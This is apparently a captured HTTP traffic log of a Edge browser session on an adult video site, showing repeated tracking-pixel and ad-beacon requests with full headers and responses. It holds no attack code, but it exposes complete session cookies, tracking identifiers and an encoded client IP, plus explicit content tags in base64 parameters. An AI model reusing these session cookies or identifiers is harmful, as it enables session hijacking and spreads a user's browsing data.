accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: text/html; charset=UTF-8
x-frame-options: SAMEORIGIN
cache-control: no-cache, no-store, must-revalidate
vary: User-Agent
rating: RTA-5042-1996-1400-1577-RTA
content-encoding: br
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_pixel?info=CiRkODY0NGVlZC1jOGI3LTQwZTMtOWQ2NS1kYTQ1MGU5NzY4NDcQgceFuAYaIjE2MjdkNDJhNTE1MTQ2MDU5ZTkzNTViNWRhNjRjMDIxLTEgAjAFOAVAq5EXSM%2FDz%2BADUgEyWNXrqd4DYJG7tYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB8WjjiLX45D6SAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzI5N4gCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCs92A3AfgAt%2FQsp8E%2BgIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuqAMBwgMFdmlkZW%2BSBBBBeWxvIFByZW1pdW0gTHRkqAQBsgQCAwHYBDc%3D&noc=0&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_pixel?info=CiRkODY0NGVlZC1jOGI3LTQwZTMtOWQ2NS1kYTQ1MGU5NzY4NDcQgceFuAYaIjE2MjdkNDJhNTE1MTQ2MDU5ZTkzNTViNWRhNjRjMDIxLTEgAjAFOAVAq5EXSM%2FDz%2BADUgEyWNXrqd4DYJG7tYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EB8WjjiLX45D6SAQJOTKoB9AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGhkIHBvcm4saW4gdGhlIGFzcyxwb3Juc3RhcixyZWFsaXR5LHJpZGluZyBkaWNrLHJ5YW4gcnlkZXIsc3Vja2luZyBkaWNrygEEc3VyZtIBBHdpZmnaAQd3aW5kb3dz4gEMMTkyLjQyLjExNi4w%2BgEMMTkyLjQyLjExNi4wggIHZGVkNzI5N4gCIZICBGVkZ2WqAgQxMC4wsgIEOTIuMNgCs92A3AfgAt%2FQsp8E%2BgIBMYIDjgF7ImFjdG9yX2lkIjo1NzAwNjYxLCJjb250ZW50X3R5cGUiOiJwYXJ0bmVyIiwidmlkZW9faWQiOjQ1NzgwOTA5MSwiaGFzaCI6ImM2OTk2MzI4NWY5ZjRmZDg1MTdiNDhjOWIzZjg3MTI3Iiwic2Vzc2lvbl9pZCI6IjQxODg5MDc0MzkwMTY5NjAyMCJ9kgMHZGVza3RvcJoDAmVuqAMBwgMFdmlkZW%2BSBBBBeWxvIFByZW1pdW0gTHRkqAQBsgQCAwHYBDc%3D&noc=0&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_pixel?info=CiQyMWU4OGE0Yy1iZjczLTQ2MGQtYjA2Ny05MDg0NmY0YTEwNTgQgceFuAYaIjA3NjM0MWU4OGQ0NTQ4NzNiOTIyMzMzMTE0MzQ3ZWQyLTEoATCJoZMBOImhkwFIgc%2F34QNSATJY1bHt3wNgy%2FixgwRyIDQwMGEyNzM4OTlhNzQwZDlhYWQxODFiMjI0YmY2NjMzgQFmTMEaZ9MRP5IBAk5MqgH0AWFuYWwsYW5hbCBzZXgsYmFyYmllIHNpbnMsYmlnIGJvb2JzLGJpZyBjb2NrLGJpZyBkaWNrLGJpZyBmYWtlIHRpdHMsYmlnIHRpdHMsYmxvbmRlLGJsb25kZSBiYWJlLGJsb3dqb2IsYnJpdGlzaCxjYXIgZnVjayxjdW0gaW4gYXNzLGZha2Vkcml2aW5nc2Nob29sLGhhcmQgYW5hbCBzZXgsaGFyZGNvcmUsaGQgcG9ybixpbiB0aGUgYXNzLHBvcm5zdGFyLHJlYWxpdHkscmlkaW5nIGRpY2sscnlhbiByeWRlcixzdWNraW5nIGRpY2vKAQRzdXJm0gEEd2lmadoBB3dpbmRvd3PiAQwxOTIuNDIuMTE2LjD6AQwxOTIuNDIuMTE2LjCCAgdkZWQ3Mjk3iAIhkgIEZWRnZaoCBDEwLjCyAgQ5Mi4w2AKxxO%2FbB%2BAC783ErAT6AgExggOOAXsiYWN0b3JfaWQiOjU3MDA2NjEsImNvbnRlbnRfdHlwZSI6InBhcnRuZXIiLCJ2aWRlb19pZCI6NDU3ODA5MDkxLCJoYXNoIjoiYzY5OTYzMjg1ZjlmNGZkODUxN2I0OGM5YjNmODcxMjciLCJzZXNzaW9uX2lkIjoiNDE4ODkwNzQzOTAxNjk2MDIwIn2SAwdkZXNrdG9wmgMCZW7CAwV2aWRlb5IEDkV2ZXJBSSBMaW1pdGVkqAQBsgQDAwIB2AQ3&noc=0&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_pixel?info=CiQyMWU4OGE0Yy1iZjczLTQ2MGQtYjA2Ny05MDg0NmY0YTEwNTgQgceFuAYaIjA3NjM0MWU4OGQ0NTQ4NzNiOTIyMzMzMTE0MzQ3ZWQyLTEoATCJoZMBOImhkwFIgc%2F34QNSATJY1bHt3wNgy%2FixgwRyIDQwMGEyNzM4OTlhNzQwZDlhYWQxODFiMjI0YmY2NjMzgQFmTMEaZ9MRP5IBAk5MqgH0AWFuYWwsYW5hbCBzZXgsYmFyYmllIHNpbnMsYmlnIGJvb2JzLGJpZyBjb2NrLGJpZyBkaWNrLGJpZyBmYWtlIHRpdHMsYmlnIHRpdHMsYmxvbmRlLGJsb25kZSBiYWJlLGJsb3dqb2IsYnJpdGlzaCxjYXIgZnVjayxjdW0gaW4gYXNzLGZha2Vkcml2aW5nc2Nob29sLGhhcmQgYW5hbCBzZXgsaGFyZGNvcmUsaGQgcG9ybixpbiB0aGUgYXNzLHBvcm5zdGFyLHJlYWxpdHkscmlkaW5nIGRpY2sscnlhbiByeWRlcixzdWNraW5nIGRpY2vKAQRzdXJm0gEEd2lmadoBB3dpbmRvd3PiAQwxOTIuNDIuMTE2LjD6AQwxOTIuNDIuMTE2LjCCAgdkZWQ3Mjk3iAIhkgIEZWRnZaoCBDEwLjCyAgQ5Mi4w2AKxxO%2FbB%2BAC783ErAT6AgExggOOAXsiYWN0b3JfaWQiOjU3MDA2NjEsImNvbnRlbnRfdHlwZSI6InBhcnRuZXIiLCJ2aWRlb19pZCI6NDU3ODA5MDkxLCJoYXNoIjoiYzY5OTYzMjg1ZjlmNGZkODUxN2I0OGM5YjNmODcxMjciLCJzZXNzaW9uX2lkIjoiNDE4ODkwNzQzOTAxNjk2MDIwIn2SAwdkZXNrdG9wmgMCZW7CAwV2aWRlb5IEDkV2ZXJBSSBMaW1pdGVkqAQBsgQDAwIB2AQ3&noc=0&ua=Mozilla%2F5.0+%28Windows+NT+10.0%3B+Win64%3B+x64%29+AppleWebKit%2F537.36+%28KHTML%2C+like+Gecko%29+Chrome%2F92.0.4515.131+Safari%2F537.36+Edg%2F92.0.902.67 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
accept: image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
sec-fetch-site: same-origin
sec-fetch-mode: no-cors
sec-fetch-dest: image
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:18 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xd/api/d/jsfp/a93c9d4c57bec7efc5d67e5c7e557145

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xd/api/d/jsfp/a93c9d4c57bec7efc5d67e5c7e557145 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:19 GMT
content-length: 0
access-control-allow-credentials: true
access-control-allow-methods: GET,POST
access-control-allow-origin: *
access-control-max-age: 86400
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=impression&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=impression&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
cookie: cookieConsent=3
cookie: _ga=GA1.1.1100938586.1728144242
cookie: bs=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: popShown=1728144256030
cookie: ua=b0bd3ce3c19504a4290f0ae2ae855676
cookie: bsdd=ynyoh9k74x8r3v7qel4tqcnpcjqzbc3c
cookie: sessid=210441633134242866
cookie: fg_afaf12e314c5419a855ddc0bf120670f=54381.100000
cookie: lvv=590947103776240458
cookie: vlc=906975376049642497
cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB
cookie: _ga_B39RFFWGYY=GS1.1.1728144241.1.1.1728144257.48.0.0
cookie: d_fs=1

Response

HTTP/2.0 200

server: openresty
date: Sat, 05 Oct 2024 16:04:19 GMT
content-type: image/gif
content-length: 43
access-control-allow-headers: Content-Type
access-control-allow-methods: GET, POST, OPTIONS
access-control-allow-origin: *
access-control-max-age: 86400
cache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
expires: Sun, 22 Jan 1984 03:00:00 GMT
p3p: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
pragma: no-cache
set-cookie: tj_UUID=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:19 GMT; Secure; SameSite=None
set-cookie: tj_UUID_v2=ChBACic4madA2arRgbIkv2YzEgsIgceFuAYQypWDCBgB; Path=/; Domain=www.pornhub.com; Expires=Mon, 04 Nov 2024 16:04:19 GMT; Secure; SameSite=None
accept-ch: Sec-CH-UA,Sec-CH-UA-Arch,Sec-CH-UA-Full-Version,Sec-CH-UA-Full-Version-List,Sec-CH-UA-Model,Sec-CH-UA-Platform,Sec-CH-UA-Platform-Version
strict-transport-security: max-age=63072000; includeSubDomains; preload
GET

https://www.pornhub.com/_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=play&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0

msedge.exe

Remote address:

66.254.114.41:443

Request

GET /_xa/deep_preroll?adid=1082016921&adplacementid=2079277361&cid=1010869731&countrycode=NL&duration=00%3A00%3A15.0&e=play&info=CiQ5MjZjNGM2YS0zMDNkLTRhMWItYTc2YS0xYzU5N2E1NjliNTEQgceFuAYaIjBhMmExNjE5YWY5ZjRkNTFiNzNmOGMyY2JjN2JjY2JjLTEoATDp0XA46dFwSOPLguIDUgEyWJf4kN0DYJmJ%2BYMEciA0MDBhMjczODk5YTc0MGQ5YWFkMTgxYjIyNGJmNjYzM4EBxY8xdy0hXz%2BSAQJOTKoB7AFhbmFsLGFuYWwgc2V4LGJhcmJpZSBzaW5zLGJpZyBib29icyxiaWcgY29jayxiaWcgZGljayxiaWcgZmFrZSB0aXRzLGJpZyB0aXRzLGJsb25kZSxibG9uZGUgYmFiZSxibG93am9iLGJyaXRpc2gsY2FyIGZ1Y2ssY3VtIGluIGFzcyxmYWtlZHJpdmluZ3NjaG9vbCxoYXJkIGFuYWwgc2V4LGhhcmRjb3JlLGluIHRoZSBhc3MscG9ybnN0YXIscmVhbGl0eSxyaWRpbmcgZGljayxyeWFuIHJ5ZGVyLHN1Y2tpbmcgZGlja8oBBHN1cmbSAQR3aWZp2gEHd2luZG93c%2BIBDDE5Mi40Mi4xMTYuMPoBDDE5Mi40Mi4xMTYuMIICB2RlZDc1MjSIAiGSAgRlZGdlqgIEMTAuMLICBDkyLjDYArGCvd8H4AKBrcWtBPoCATGCA44BeyJhY3Rvcl9pZCI6NTcwMDY2MSwiY29udGVudF90eXBlIjoicGFydG5lciIsInZpZGVvX2lkIjo0NTc4MDkwOTEsImhhc2giOiJmNjdjNWYwZTAxYjhhZThjZTc2MTU5ZWJmZDc4OTI3ZiIsInNlc3Npb25faWQiOiIyMTA0NDE2MzMxMzQyNDI4NjYifZIDB2Rlc2t0b3CaAwJlbpIED1NlbnNlbWFrZXJzIEIuVqgEAbIEAwMCAdgENw%3D%3D&noc=0&price=%24%7BAUCTION_PRICE%7D&siteid=2&t=fDEwMDAxNDY3MjF8&zoneid=1845481&nstartPoint=0 HTTP/2.0
host: www.pornhub.com
sec-ch-ua: "Chromium";v="92", " Not A;Brand";v="99", "Microsoft Edge";v="92"
dnt: 1
sec-ch-ua-mobile: ?0
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.131 Safari/537.36 Edg/92.0.902.67
sec-ch-ua-arch: "x86"
sec-ch-ua-full-version: "92.0.902.67"
sec-ch-ua-platform-version: "10.0"
sec-ch-ua-model:
sec-ch-ua-platform: "Windows"
accept: */*
sec-fetch-site: same-origin
sec-fetch-mode: cors
sec-fetch-dest: empty
referer: https://www.pornhub.com/view_video.php?viewkey=66e6fe092a6e2
accept-encoding: gzip, deflate, br
accept-language: en-US,en;q=0.9
cookie: platform=pc
cookie: ss=418890743901696020
cookie: __s=6701636F-42FE722901BB38B09A-3E717A
cookie: __l=6701636F-42FE722901BB38B09A-3E717A
cookie: accessAgeDisclaimerPH=1
